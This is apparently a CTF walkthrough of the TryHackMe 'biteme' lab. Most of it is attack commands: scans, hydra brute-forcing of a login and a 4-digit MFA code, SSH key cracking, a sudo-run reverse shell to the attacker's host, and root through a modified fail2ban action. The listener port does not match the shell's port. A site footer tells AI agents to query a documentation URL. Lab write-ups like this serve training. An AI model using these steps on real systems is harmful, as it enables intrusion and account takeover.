# biteme **Room Link:** ## Initial Scan **Kali** 
nmap -A $VICTIM
## Scan all ports **Kali** 
nmap -sV -sT -O -p 1-65535 $VICTIM
## TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```
**Kali** ``` gobuster dir -u http://$VICTIM/console -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x phps ```
## **Finding username** **Kali** ``` echo 6a61736f6e5f746573745f6163636f756e74 | xxd -r -p ```
## Recreating login I merged configs.phps, functions.php and index.phps into a index.php file. Made some modifications so that it could run when hosted locally without the mfa part of the code so then I can try to bruteforce the credentials. **index.php** ```

Please sign in

Incorrect details

``` **Kali** ``` echo MFA > mfa.php php -S 127.0.0.1:81 ```
## Bruteforce **Kali** ``` hydra -l jason_test_account -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 81 http-post-form "/index.php:user=^USER^&pwd=^PASS^:F=Incorrect details" ```
**Browser** ``` Username: jason_test_account Password: violet ```
**Kali** ``` python -c "with open('output.txt', 'w') as file: [file.write(f'{str(i).zfill(4)}\n') for i in range(10000)]" ``` **Kali** ``` git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra/ ./configure make make install cd .. thc-hydra/hydra -l jason_test_account -P output.txt $VICTIM http-post-form "/console/mfa.php:code=^PASS^:H=Cookie: PHPSESSID=hshqcs3n42r9qjs5b2850r9alt; user=jason_test_account; pwd=violet:F=Incorrect code" -T 64 ```
## LFI
**Kali** ``` chmod 600 /opt/john/ssh2john.py id_rsa > id_john.txt john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt ```
## TCP/22 - SSH **Kali** ``` ssh -i id_rsa jason@$VICTIM Password: 1a2b3c4d ```
## Lateral Movement **Victim** ``` sudo -l ```
**Victim** ``` echo '#!/bin/bash' > shell.sh echo 'sh -i >& /dev/tcp/$KALI/1337 0>&1' >> shell.sh ``` **Kali** ``` nc -lvnp 1338 ``` **Victim** ``` sudo -u fred ./shell.sh ```
Get autocomplete ``` python -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` ## Privilege Escalation **Victim** ``` sudo -l ```
**Victim** ``` cat /etc/fail2ban/jail.conf ```
**Victim** ``` ls -la /etc/fail2ban/action.d/iptables-multiport.conf vi /etc/fail2ban/action.d/iptables-multiport.conf ```
**Victim** ``` sudo /bin/systemctl restart fail2ban ``` Now we need to enter bad passwords until we've triggerd the ban action **Kali** ``` ssh root@$VICTIM ```
**Victim** ``` /bin/bash -p whoami ```
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/biteme.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.